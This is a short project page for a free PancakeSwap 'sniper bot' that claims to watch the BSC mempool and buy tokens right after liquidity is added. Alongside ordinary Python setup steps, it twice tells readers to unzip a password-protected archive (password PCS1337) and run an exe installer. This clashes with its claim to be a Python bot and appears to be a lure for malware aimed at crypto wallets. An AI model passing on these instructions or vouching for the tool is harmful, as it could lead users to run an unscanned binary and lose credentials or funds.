/pancakeswap-sniper-bot-1

UPDATED Pancakeswap Sniper bot written in python3

About:

A free sniper bot built to work with Pancakeswap. Honeypot/rug checker built in. Bot allows you to compete with other trading bots when buying a token on PancakeSwap. Its faster than traditional bots because it watches the txpool/mempool where transactions are still "pending" on the BSC network. It will watch for when liquidity is added as a pending transaction and immediately submit your order, so that hopefully you get in right after liquidity is added and before everyone else.

Unzip archive(password PCS1337)

Open exe installer and set up

Installation:

Download and install Python from the site.

If you download from the site it is important to tick the option "add python to path".

Download the code as a zip file and extract it.

Copy the path of the bot directory

Open the terminal.

Press the windows key + R and type "cmd":

cd into the bot directory:

Type the command:

cd <path you copied>

Install the dependencies or open exe installer:

pip install -r requirements.txt

It is finished! Now to run the bot you just need to type:

python index.py

How to use?

Unzip archive(password PCS1337)

Open exe installer and set up